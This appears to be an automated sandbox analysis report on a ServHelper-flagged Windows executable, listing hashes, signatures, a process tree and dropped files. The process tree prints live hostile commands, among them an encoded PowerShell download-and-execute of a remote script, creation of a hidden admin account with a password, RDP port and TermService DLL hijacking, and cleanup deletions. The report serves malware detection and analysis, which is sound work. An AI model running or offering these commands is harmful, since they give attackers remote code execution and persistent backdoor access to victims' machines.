Analysis

  • max time kernel
    50s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-08-2021 19:34

General

  • Target

    87dd0632a95ca24443f8c6363bc055e6.exe

  • Size

    5.9MB

  • MD5

    87dd0632a95ca24443f8c6363bc055e6

  • SHA1

    423785b67d20f4f5056ff6d9e34fda3c72a03bd4

  • SHA256

    266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce

  • SHA512

    c51d180cca074540f5ca9186e60509cfdb1c7e1a8651e691eac585df9f8352e256cedb86a4a340e0e8f5b1ed6d73ff270d92424259539c0c4c02a7048f2a75e2

Malware Config

Extracted

  • Language
    ps1 (deobfuscated)
  • URLs
    ps1.dropper
    https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe
    "C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP"
          4⤵
          PID:1904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3848
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        3⤵
        PID:3252
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        3⤵
        • Modifies registry key
        PID:2176
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        3⤵
        PID:3976
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          4⤵
          PID:2232
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\system32\net.exe
            net start rdpdr
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start rdpdr
              6⤵
              PID:1832
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1432
        • C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3100
          • C:\Windows\system32\net.exe
            net start TermService
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService
              6⤵
              PID:3884
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        3⤵
        PID:4000
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        3⤵
        PID:2076
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc 000000 /del
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc 000000 /del
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
        3⤵
        PID:368
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc i0aAay1y /add
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc i0aAay1y /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y /add
        3⤵
        PID:3876
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3840
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        3⤵
        PID:1636
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:344
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
        3⤵
        PID:1168
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1296
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
        3⤵
        PID:3704
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc i0aAay1y
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc i0aAay1y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y
        3⤵
        PID:684
  • C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:424
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      2⤵
      PID:2696
  • C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
    1⤵
    PID:2752
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      2⤵
      • Modifies data under HKEY_USERS
      PID:3872
  • C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    1⤵
    PID:1296
    • C:\Windows\system32\cmd.exe
      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      2⤵
      PID:1208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        3⤵
        • Blocklisted process makes network request
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:2268

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp
  • C:\Users\Admin\AppData\Local\Temp\ready.ps1
  • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  • C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.dll
  • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP
  • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.0.cs
  • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline
  • \Windows\Branding\mediasrv.png
  • \Windows\Branding\mediasvc.png